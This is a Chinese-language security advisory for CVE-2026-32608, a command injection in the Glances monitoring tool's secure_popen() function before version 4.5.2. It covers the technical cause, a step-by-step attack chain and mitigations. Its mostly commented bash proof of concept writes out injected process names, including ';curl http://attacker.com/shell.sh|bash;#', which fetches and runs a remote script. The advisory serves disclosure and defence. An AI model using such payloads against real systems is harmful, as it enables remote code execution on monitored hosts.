CVE-2026-32608 Glances命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-32608

漏洞类型

命令注入

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Glances

漏洞概述

Glances是一款开源的跨平台系统监控工具。该工具的动作系统允许管理员配置shell命令，当监控阈值超过时自动执行。这些命令支持Mustache模板变量（如{{name}}、{{key}}），用于填充运行时监控数据。secure_popen()函数负责执行这些命令，它通过分割命令字符串然后传递给subprocess.Popen(shell=False)来实现管道、重定向和链操作符的处理。在4.5.2之前的版本中，当Mustache渲染的值（如进程名、文件系统挂载点或容器名）包含管道(|)、重定向(>、<)或链操作符(;、&)等元字符时，渲染后的命令会被意外分割，导致攻击者可以通过控制进程名或容器名来注入任意命令。这是一种典型的命令注入漏洞，攻击者无需特殊权限即可在本地利用此漏洞。

技术细节

漏洞的核心在于secure_popen()函数对Mustache模板渲染值的处理方式。该函数设计用于安全执行管理员配置的监控命令，通过subprocess.Popen(shell=False)来避免shell注入风险。然而，该函数自己实现了管道、重定向和链操作符的解析逻辑，通过分割命令字符串来分别处理各个部分。问题在于，分割逻辑基于shell元字符（|、>、<、;、&等），但没有考虑到Mustache模板变量被渲染后可能包含这些元字符。例如，如果进程名被设置为evil;whoami，则secure_popen()会将其分割为evil和whoami两部分，从而导致命令注入。攻击者只需创建一个包含shell元字符的进程名或容器名，等待Glances的监控阈值触发，即可执行任意命令。由于secure_popen()仍然使用subprocess.Popen(shell=False)，原本设计是安全的，但分割逻辑破坏了这种安全性。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统上进程名或容器名的控制权，可以是创建恶意容器、修改进程名称或创建特殊命名的文件

STEP 2

步骤2

攻击者在进程名或容器名中注入shell元字符（如;、|、>、&等），构造恶意载荷如evil;whoami

STEP 3

步骤3

Glances监控到该进程/容器，当监控阈值超过时触发预设的action命令，命令包含Mustache模板变量{{name}}

STEP 4

步骤4

Mustache引擎将{{name}}渲染为包含shell元字符的恶意进程名/容器名

STEP 5

步骤5

secure_popen()函数基于shell元字符分割渲染后的命令字符串，将恶意载荷分割成多个独立命令

STEP 6

步骤6

分割后的命令通过subprocess.Popen(shell=False)执行，攻击者注入的恶意命令被成功执行，实现命令注入

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-32608 PoC - Process Name Command Injection
# This PoC demonstrates how a malicious process name can inject commands

# Step 1: Create a process with shell metacharacters in the name
# In a real attack, this could be done by:
# - Creating a container with a crafted name
# - Renaming a running process
# - Creating a file with special characters in its path

# Example: Create a fake process entry that will trigger the action
# The process name contains: ;touch /tmp/pwned;
# When rendered in Mustache template like: /path/to/{{name}}
# It becomes: /path/to/;touch /tmp/pwned;
# Which gets split and executed as separate commands

# Simulated PoC - Process name with command injection payload
MALICIOUS_NAME=";curl http://attacker.com/shell.sh|bash;#"
echo "Malicious process name: $MALICIOUS_NAME"

# Step 2: Wait for Glances monitoring to trigger the action
# The action command might be something like:
# ACTION_CMD="alert.sh --process {{name}}"
# After Mustache rendering: alert.sh --process ;curl http://attacker.com/shell.sh|bash;#
# secure_popen() splits this into multiple commands

# Step 3: Verify command injection
# The injected command (curl http://attacker.com/shell.sh|bash) will be executed

影响范围

Glances < 4.5.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 禁用Glances的action功能或移除所有包含Mustache变量的action命令；2) 对所有进程名和容器名实施严格的白名单策略，过滤或拒绝包含shell元字符的特殊字符；3) 限制用户创建进程名或容器名的权限，防止恶意输入；4) 启用系统级审计，监控Glances进程执行的异常命令。